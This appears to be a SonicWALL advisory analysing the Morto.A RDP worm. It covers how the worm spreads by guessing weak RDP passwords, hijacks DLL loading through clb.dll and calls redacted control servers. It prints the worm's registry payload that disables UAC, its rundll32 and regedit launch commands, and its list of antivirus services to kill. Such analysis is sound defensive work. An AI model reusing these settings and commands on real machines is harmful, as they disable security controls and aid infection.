Embed Size (px)
Citation preview
Conexión remota con rundll32
SonicWALL Security Center
Back to SonicALERT
RDP Worm Morto.A (Aug. 31, 2011)
Description
SonicWALL UTM Research team received reports of a new internet worm propagating
in the wild. This worm targets Remote Desktop Protocol (RDP) and has the capability
to download additional malicious components, terminate Antivirus related security
processes and services, perform Denial-of-Service attack (DDOS) and can be remotely
controlled from a malicious server.
Process of Infection:
This worm targets machines via Remote Desktop Protocol (RDP) by compromising
weak administrator passwords. Once a system is infected, it will scan the local network
for RDP connections through port 3389. It uses a set of usernames and passwords to
gain access to these RDP machines and infects them.
Installation:
This worm has three components: Main executable, DLL loader, and the payload.
Main Executable
The main executable drops the DLL loader ntshrui.dll on %windir%/temp directory and
copies it as clb.dll on %windir% directory.
It adds the following registry entries as part of its installation:
• HKLM\SYSTEM\Wpa\it
• HKLM\SYSTEM\Wpa\id
• HKLM\SYSTEM\Wpa\ie
• HKLM\SYSTEM\Wpa\sr
• HKLM\SYSTEM\Wpa\sn
• HKLM\SYSTEM\Wpa\md
It then deletes the following registry to remove its tracks:
• HKCU "Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
The DLL loader clb.dll located at %windir% directory is loaded once the malware
spawns the process Registry Editor (regedit.exe).
There is a legitimate DLL file clb.dll located in %windir%/system32 directory that
regedit.exe actually uses. But because of the design of how windows loads files,
wherein it will look for them at %windir% directory first before looking at
%windir%/system32, the malware component clb.dll will in effect be loaded instead of
the legitimate one.
DLL Loader
After getting loaded by the process regedit, it will decrypt the payload DLL and loads it
to memory. It will also perform the following activities:
Added Registry:
Key: HKLM\SYSTEM\CurrentControlSet\Control\Windows
Value: "NoPopUpsOnBoot"
Data: "1"
Key: HKLM\SYSTEM\CurrentControlSet\Services\6to4\Parameters
Value: "ServiceDll"
Data: "%windir%\temp\ ntshrui.dll"
Modified Registry:
Key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS\Para
meters
Value: ServiceDll
Data Before: %SystemRoot%\system32\sens.dll Data After:
%SystemRoot%\system32\sens32.dll
Added Files:
%windir%\offline web pages\{Current Date}
%windir%\offline web pages\1.40_testDdos
%windir%\offline web pages\cache.txt - blocked as [ GAV: Morto.A_2 (Trojan)
]
%windir%\system32\sens32.dll - blocked as [ GAV: Morto.A_2 (Trojan) ]
DLL Payload
The malware attempts to connect to RDP servers on local network through port 3389
using administrator accounts. Some of the accounts are shown below:
It will copy the following files on the RDP workstations through \\tsclient\a\.
• \\tsclient\a\a.dll - blocked as [ GAV: Morto.A_2 (Trojan) ]
• \\tsclient\a\r.reg
Contents of the file r.reg is shown below which ensures rundll32.exe will run the
malware with administrator privileges and without prompting for user for permission
for any system changes:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio
n\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:0
"EnableLUA"=dword:0
[HKEY_CURRENT_USER\Software\Microsoft\Windows
NT\CuurrentVersion\AppCompatFlags\Layers]
"c:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"d:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"e:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"f:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"g:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"h:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"i:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"d:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"e:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"f:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"g:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"h:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"i:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"c:\\winnt\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win2008\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win2k8\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win7\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\windows7\\system32\\rundll32.exe"="RUNASADMIN"
Once files have been copied to RDP workstations, the malware will run those with the
following commands:
• "regedit /s \\tsclient\a\r.reg"
• "rundll32 \\tsclient\a\a.dll a"
It also terminates the following services related to AV security softwares:
• 360rp
• a2service
• ACAAS
• ArcaConfSV
• AvastSvc
• avguard
• avgwdsvc
• avp
• avpmapp
• ccSvcHst
• cmdagent
• coreService
• FortiScand
• FPAVServer
• freshclam
• fsdfwd
• GDFwSvc
• K7RTScan
• knsdave
• KVSrvXP
• kxescore
• mcshield
• MPSvc
• MsMpEng
• NSESVC.EXE
• PavFnSvr
• RavMonD
• SavService
• scanwscs
• Shell
• SpySweeper
• Vba32Ldr
• vsserv
• zhudongfangyu
Network Activities:
The malware tries to contact the following URLs:
• qf{REMOVED}.net
• ms.ji{REMOVED}nfo
• ms.ji{REMOVED}o.cc
• ms.ji{REMOVED}o.be
SonicWALL Gateway AntiVirus provides protection against this worm via the
following signatures:
GAV: Morto.A (Worm)
GAV: Morto.A_2 (Trojan)
